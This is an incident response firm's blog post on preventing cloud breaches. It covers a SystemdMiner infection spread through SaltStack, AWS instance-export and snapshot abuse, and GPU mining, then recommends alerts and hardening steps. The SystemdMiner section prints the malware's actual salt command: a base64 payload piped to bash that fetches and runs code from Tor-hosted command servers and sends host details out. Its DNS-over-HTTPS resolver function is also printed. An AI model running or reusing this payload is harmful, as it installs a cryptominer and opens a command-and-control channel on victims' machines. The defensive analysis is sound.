From the Trenches: Common-Sense Measures to Prevent Cloud Incidents

Brenton Morris
ProferoSec
7 min read · Nov 21, 2021

Introduction

As an incident response team, we see a lot of cloud breaches that could have been prevented. Adequate protection requires in-depth knowledge of the cloud provider and its APIs, as well as ample preparation. When a company faces time constraints, or its engineers have not received up-to-date training after a cloud migration, vulnerabilities open up. Whatever the reason, many cloud attacks can be easily avoided; in the following case studies, we offer advice on how.

This post is by no means a comprehensive guide to creating secure cloud environments. Rather, the examples included illustrate common weaknesses we encounter during our engagements, and steps companies can take to bolster their defenses.

If you are more of a video person, most of the content of this post was presented at a European cloud event, which you can view here: https://www.youtube.com/watch?v=QyzFe4uHSAw

SystemdMiner running in GCP

A healthcare provider contacted us after they received a GCP alert about one of their Linux instances. We carried out a forensic analysis of the instance in question and found a variant of SystemdMiner running on the machine. This miner consists of a series of obfuscated bash scripts, uses a cron job to achieve persistence, and contains a few other tricks to squeeze as much mining power out of an organization as possible before detection.
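
If you suspect a host is affected, the cron-based persistence is a quick thing to hunt for. Below is a minimal sketch, assuming root access and a standard cron setup; systemd timers are also worth checking.

# List every local user's crontab plus the system cron directories.
for u in $(cut -d: -f1 /etc/passwd); do
  echo "== crontab for $u =="
  crontab -l -u "$u" 2>/dev/null
done
ls -la /etc/cron.d /var/spool/cron* 2>/dev/null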

SystemdMiner attempts to use SaltStack as a means to spread throughout an organization. If it is executed on a host which acts as a Salt master node, it will execute a base64-encoded payload on every minion the master can reach. It does this by running the following salt command:

salt ‘*’ cmd.run ‘echo blA4YnlQVUdPd0tqVmZQWlpzcDVvY3RkWEhUV0d5UHFnVmVZODJ6VjFkZTZBWTB5ZEF0Z0VHbW8rSmF1bUVmVgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJ3dnp5djJucHRqdXhjcW9pYmVrbHhlc2U0Nmo0dW9uemFhcHd5bDZ3dmhka25qbHFsY29ldTdpZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbWF6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQoY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaXQgb25pb24uZm91bmRhdGlvbiBvbmlvbi5jb20uZGUgb25pb24uc2ggdG9yMndlYi5zdSAKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash’

Included in this next stage is a snippet of code that uses a list of DNS over HTTPS services to resolve the relay.tor2socks.in domain, a service which this malware uses to communicate with .onion hidden services hosting its C2 servers on the Tor network:

sockz() {
n=(doh.defaultroutes.de dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%10))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}

This style of attack is becoming increasingly commonplace as more organizations have begun to take advantage of infrastructure as code — but without, unfortunately, utilizing the greatest strengths of this way of working:

  • The ability to block all changes to an organization’s infrastructure until the changes are reviewed and approved by multiple parties.
  • The removal of the need to grant engineers working on the infrastructure access to the underlying resources.

This attack serves as a great example of why protecting your deployment and management resources is important. A single engineer should never have the ability to make changes to infrastructure — this special access should instead be delegated to a secure pipeline where changes need to go through a review process and be approved by multiple parties before execution. Additionally, heightened care needs to be taken when defending these pipelines and their critical assets such as salt master nodes, terraform state files, code repositories storing the automation templates, etc.
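
On the Salt side specifically, publisher ACLs can reduce the blast radius of a compromised automation account. The sketch below is illustrative only: it assumes a stock Salt master reading config from /etc/salt/master.d/, uses a hypothetical "deploy" CI user, and will not stop an attacker who already has root on the master.

# Restrict the CI user to applying states and blacklist blanket remote
# shell execution; paths, the "deploy" user, and values are illustrative.
cat > /etc/salt/master.d/acl.conf <<'EOF'
publisher_acl:
  deploy:
    - state.apply
    - state.highstate
publisher_acl_blacklist:
  modules:
    - cmd.run
    - cmd.script
EOF
systemctl restart salt-master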

AWS VM Export Abused to Breach Hashicorp Vault

Often when moving from traditional IT infrastructure to a cloud environment, some seemingly minor details get overlooked. This can lead to a domino effect of severe consequences in the case of a breach. In one example, after a large AWS breach, we conducted an IR investigation for our client to figure out how the attacker gained access to so many access tokens within the organization. The only correlation among these tokens was that they were all stored in a HashiCorp Vault instance which was running in EC2.

When examining the CloudTrail logs, we found a call to the CreateInstanceExportTask API. This API exports an EC2 instance as a virtual machine image to an S3 bucket; the attacker used it to export the HashiCorp Vault instance and then downloaded the image from the bucket. From there, many other services were compromised using the secrets contained within this instance.

Although this was not the initial point of entry used to obtain access to the organization, this escalation of privileges was made possible because the client had not adequately restricted calls to these APIs — a small miss that resulted in a cascade of larger issues.

When setting up AWS and other cloud-based infrastructure, it is essential to consider how an attacker could access data contained within compute and database instances. We also recommend placing high-value VMs such as Vault instances, along with other sensitive data, in their own restricted AWS account, and establishing a system to monitor any authentications happening inside these accounts.
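
One hedged way to enforce this separation is an AWS Organizations service control policy that denies the export and snapshot-sharing APIs in the accounts holding these high-value instances. The policy name below is made up, and the action list is a starting point rather than a complete inventory.

# Hypothetical SCP blocking VM export and snapshot/image sharing; attach it
# to the OU or account that hosts the sensitive instances.
cat > deny-vm-export.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyInstanceExportAndSnapshotSharing",
      "Effect": "Deny",
      "Action": [
        "ec2:CreateInstanceExportTask",
        "ec2:ModifySnapshotAttribute",
        "ec2:ModifyImageAttribute"
      ],
      "Resource": "*"
    }
  ]
}
EOF
aws organizations create-policy \
  --name DenyVMExport \
  --type SERVICE_CONTROL_POLICY \
  --description "Block VM export and snapshot/image sharing" \
  --content file://deny-vm-export.json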

EC2 GPU Miners

One common method used to monetize AWS account access in recent years is to spin up GPU-enabled EC2 instances, which mine cryptocurrency on behalf of the attacker, on the victims' dime. Tesla fell victim to this kind of attack in 2018.

These attacks are not the most effective way to turn illegitimate access into income; they are usually part of wide-scale automated campaigns rather than manual, hands-on-keyboard intrusions.

These attacks show why it is important to have billing alerts enabled, so that you receive an alert when an account's usage is above normal. We also recommend tailoring your CloudTrail alerts to your organization's usage. For example, if you don't use GPU-enabled EC2 instances or higher-tier CPU instances, you should be alerted when one is spun up in your account, prompting your company to investigate accordingly.
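
As a concrete starting point, AWS publishes an EstimatedCharges metric in us-east-1 once billing alerts are enabled in the account preferences, and a CloudWatch alarm can watch it. The threshold, alarm name, and SNS topic below are placeholders to adapt to your own normal spend.

# Sketch of a billing alarm; enable "Receive Billing Alerts" first and
# replace the threshold and SNS topic with your own values.
aws cloudwatch put-metric-alarm \
  --region us-east-1 \
  --alarm-name estimated-charges-above-normal \
  --namespace AWS/Billing \
  --metric-name EstimatedCharges \
  --dimensions Name=Currency,Value=USD \
  --statistic Maximum \
  --period 21600 \
  --evaluation-periods 1 \
  --threshold 500 \
  --comparison-operator GreaterThanThreshold \
  --alarm-actions arn:aws:sns:us-east-1:123456789012:billing-alerts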

MongoDB Compromise

During another incident, an extortionist attacker made claims that they had a copy of the client’s production MongoDB database, containing sensitive customer information.

The database in question was housed in a private subnet, accessible only via a few backend API instances, none of which showed any signs of compromise. The HTTP request logs were likewise clean. So how did the attacker gain access to this data?

After investigating the CloudTrail logs, we discovered the attacker had simply restored a snapshot of the DocumentDB / MongoDB clusters using a public subnet and a security group that allowed connections from 0.0.0.0/0. Then, they connected to the database and pulled down all the data before destroying the cluster they had created. This was possible because the attacker had access to an AWS access key which could create new clusters using these snapshots, in addition to the fact that the victim organization had not set up CloudTrail alarms for such actions.

Mitigating the risk of this kind of attack requires adhering to the principle of least privilege and actively monitoring for anything out of the ordinary. Alerts that we would recommend creating to catch this kind of activity include:

  • Any new security group rules allowing connections from anywhere (0.0.0.0/0) or, depending on your use case, from any non-RFC 1918 (i.e., public) address range; a sketch of such an alert follows this list.
  • Any new data resources being created (RDS instances, DocumentDB clusters, ElastiCache, etc) as these resources are seldom created. In cases when they are created more than usual — in staging/dev environments or during blue/green deployments — simply add the appropriate exceptions in your alerting.
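
As one hedged way to wire up the first alert, a CloudWatch Logs metric filter over the CloudTrail log group can flag security groups being opened up and clusters being created or restored from snapshots. The log group name, metric namespace, and event list below are illustrative, and the resulting metric still needs an alarm attached to it.

# Assumes CloudTrail already streams to a CloudWatch Logs group named
# "cloudtrail-logs"; names and the event list are illustrative only.
aws logs put-metric-filter \
  --log-group-name cloudtrail-logs \
  --filter-name suspicious-network-and-restore-calls \
  --filter-pattern '{ ($.eventName = AuthorizeSecurityGroupIngress) || ($.eventName = CreateDBCluster) || ($.eventName = RestoreDBClusterFromSnapshot) }' \
  --metric-transformations metricName=SuspiciousApiCalls,metricNamespace=SecurityAlerts,metricValue=1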

Timely responses to these kinds of alerts can be the difference between stopping the exfiltration of private data or picking up the pieces in the aftermath of an incident.

Looking for Offensive Attackers

When scanning for attackers in your environment, it is important to establish and follow best practices. Some tips are below:

Prep

It is essential to prepare your environment to be able to detect malicious behavior:

  • Stream your CloudTrail logs to an S3 bucket with MFA delete enabled, preferably in a separate AWS account dedicated to storing audit logs
  • Ensure Athena is configured so that during an incident you can quickly query your CloudTrail logs from this bucket
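
For the first item above, note that MFA delete can only be turned on by the bucket owner's root user and requires versioning. A minimal sketch, with a placeholder bucket name, account ID, and MFA code:

# Illustrative only: run as the bucket owner's root user, and replace the
# bucket name, MFA device ARN, and one-time code.
aws s3api put-bucket-versioning \
  --bucket org-audit-cloudtrail-logs \
  --versioning-configuration Status=Enabled,MFADelete=Enabled \
  --mfa "arn:aws:iam::123456789012:mfa/root-account-mfa-device 123456"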

Asset Discovery

Having good config and asset management is extremely important for detecting something out of the ordinary that requires investigation. These are some of the tools we use to find assets in our clients' environments:

  • Scout Suite
  • AWS Billing Console
  • AWS Config
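
Scout Suite, for example, produces an offline HTML report of everything it can enumerate across an account, which makes it a quick way to build an initial asset inventory. A minimal invocation, assuming a read-only credentials profile named audit-readonly:

# Install and run Scout Suite against AWS; the profile name is a placeholder.
python3 -m pip install scoutsuite
scout aws --profile audit-readonly --report-dir ./scout-report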

Use the Tools Available to You

Many other tools are available to organizations: open-source projects such as SkyWrapper, which finds suspicious STS token chains in AWS accounts; Amazon GuardDuty; and even the billing console, where reviewing changes can surface malicious activity.
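
GuardDuty in particular is agentless and can be enabled per region with a single call; findings still need somewhere to go, such as an EventBridge rule feeding your alerting or SIEM.

# Enable GuardDuty in the current region; repeat for every region you use.
aws guardduty create-detector --enable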

Investigate CloudTrail

If CloudTrail is active but is not being regularly monitored and reviewed, it can only be used as evidence after an incident. This is a missed opportunity, because it is one of the best and easiest tools to engage for early detection and prevention. Some things to look for when reviewing logs include:

  • Known IOCs appearing in the logs
  • Changes to resources such as CloudFormation stacks; configure these events to trigger alerts so they can be reviewed promptly
  • Database actions such as copies being made, data deleted, new instances created or instances being exported
  • Network configuration changes/security group policy modifications
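
If Athena is already configured over the CloudTrail bucket, hunting for the kinds of calls listed above can be a single query. The database, table, and output location below are placeholders for your own Athena setup.

# Hypothetical hunt query; substitute your own database, table, and results bucket.
aws athena start-query-execution \
  --query-execution-context Database=security_audit \
  --result-configuration OutputLocation=s3://athena-results-bucket/cloudtrail-hunts/ \
  --query-string "SELECT eventtime, eventname, useridentity.arn, sourceipaddress FROM cloudtrail_logs WHERE eventname IN ('CreateInstanceExportTask', 'RestoreDBClusterFromSnapshot', 'AuthorizeSecurityGroupIngress') ORDER BY eventtime DESC"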

Common Mistakes

Here are some common mistakes we run into when we start an IR:

  • Logs such as CloudTrail stored incorrectly in S3, for example with a misconfigured target prefix when multiple AWS accounts' trails are delivered to the same bucket. This hinders the creation of Athena tables.
  • Logs from before an incident being unsearchable, because Athena was never fully configured or the logs were not exported to CloudWatch or other log storage such as Elasticsearch.
  • Engineers involved having no incident response training or practice. Game days are excellent opportunities to show engineers what they should do in the early stages of a security incident.
  • Alerting has not been tailored for the organization’s environment. There is no “one size fits all” for alerting. Only you know your environment well enough to understand what is normal activity and what is not — the best people to write alerts are always your own engineers.

Overall Recommendations

In summary, these are the most important elements in securing a cloud environment — which together will offer your company a vital layer of protection against a range of the most common cloud threats in circulation today:

  • Get the basics right first — don’t wait for an attack
  • Know your environment: monitor your weak points, understand your usual activity
  • Create alerts tailored to your usage
  • Investigate alerts in a timely manner
  • Enable all available logging (data access logging, packet flow logs, etc)
  • Ensure logs are searchable
  • Practice your response, and provide regular updates and training for your engineers
  • Constantly reevaluate your security requirements as your environment changes
